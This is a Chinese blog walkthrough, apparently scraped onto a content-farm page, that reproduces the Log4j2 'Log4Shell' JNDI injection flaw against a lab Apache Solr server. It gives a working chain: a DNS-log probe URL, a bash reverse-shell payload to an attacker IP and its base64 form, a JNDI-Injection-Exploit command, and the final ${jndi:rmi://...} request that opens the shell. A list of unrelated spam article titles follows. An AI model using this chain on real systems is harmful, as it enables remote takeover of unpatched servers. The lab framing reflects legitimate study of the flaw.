当前位置: 首页 > news >正文

浙江专业网站建设商城供应教育培训网

浙江专业网站建设商城供应,教育培训网,做网站怎么在主机上放图片,中国智慧团建网站一、漏洞特征 Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的…

一、漏洞特征
Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。
影响版本:Apache Log4j 2.x <= 2.14.1
访问http://192.168.232.131:8983/即可查看到Apache Solr的后台页面
在这里插入图片描述

访问
http://192.168.232.131:8983/solr/admin/cores?action=${jndi:ldap://ugvqt3.dnslog.cn}
dnslog可以收到相关日志
在这里插入图片描述

二、漏洞复现
1.准备payload
bash -i >& /dev/tcp/192.168.245.2/6969 0>&1
192.168.245.2是攻击机ip
base加密:YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0NS4yLzY5NjkgMD4mMQ==
在这里插入图片描述

2.开启监听
在这里插入图片描述

3.获取jndi payload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c " {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0NS4yLzY5NjkgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.245.2
这里echo后面就是你加密之后的值,最后面的IP还是攻击机的IP,回车启动
在这里插入图片描述

启动后提取第一个payload:rmi://192.168.245.2:1099/sfvz6q
4.反弹shell
http://192.168.232.131:8983/solr/admin/cores?action=${jndi:rmi://192.168.245.2:1099/sfvz6q}
在这里插入图片描述

http://www.tj-hxxt.cn/news/59727.html

相关文章:

  • 闸北区网站建设网页设云盘搜
  • 做的比较好看的网站百度官方电话24小时
  • 河北提供网站制作公司哪家好jsurl中文转码
  • 郑州 做网站广州抖音推广
  • 网站导航样式广告公司注册
  • 购物网站怎么做推广超级seo工具
  • 电商网站平台有哪些功能模块nba最新消息新闻
  • asp企业网站自助建站系统免费版超漂亮版dw如何制作网页
  • 深达网站制作深圳公司百度在线翻译
  • 佛山制作网站设计报价个人自己免费建网站
  • 一条龙网站建设哪家好广州网络营销选择
  • 装修房子找哪家装修公司好seo引擎优化外包
  • 深圳企业网站建设公司排名推广普通话手抄报简单又好看内容
  • 果洛营销网站建设百度上做优化一年多少钱
  • 信誉好的盐城网站建设网站优化方案案例
  • 鹰潭建设网站html网页制作网站
  • 二手房网站怎么做才能接到电话今日热点新闻视频
  • 做网站一定要有营业执照吗引擎优化
  • 网站建设费和网站维护费的区别腾讯广告推广平台入口
  • 济南住房和城乡建设部网站电子商务seo
  • 六盘水市网站建设淘宝关键词搜索量查询
  • 工商网站官网入口网络推广是做什么工作的
  • 合肥市网站制作谷歌seo网络公司
  • wordpress多站点使用期限插件seo怎么去优化
  • 丹东网站开发公司seo推广网络
  • 佛山网站建设外包网站多久被百度收录
  • 如何限制ip访问网站购物网站
  • 网站建站需求优化设计三年级上册答案
  • 网站使用方法seo外包杭州
  • 奢侈品网站 方案广州最新消息今天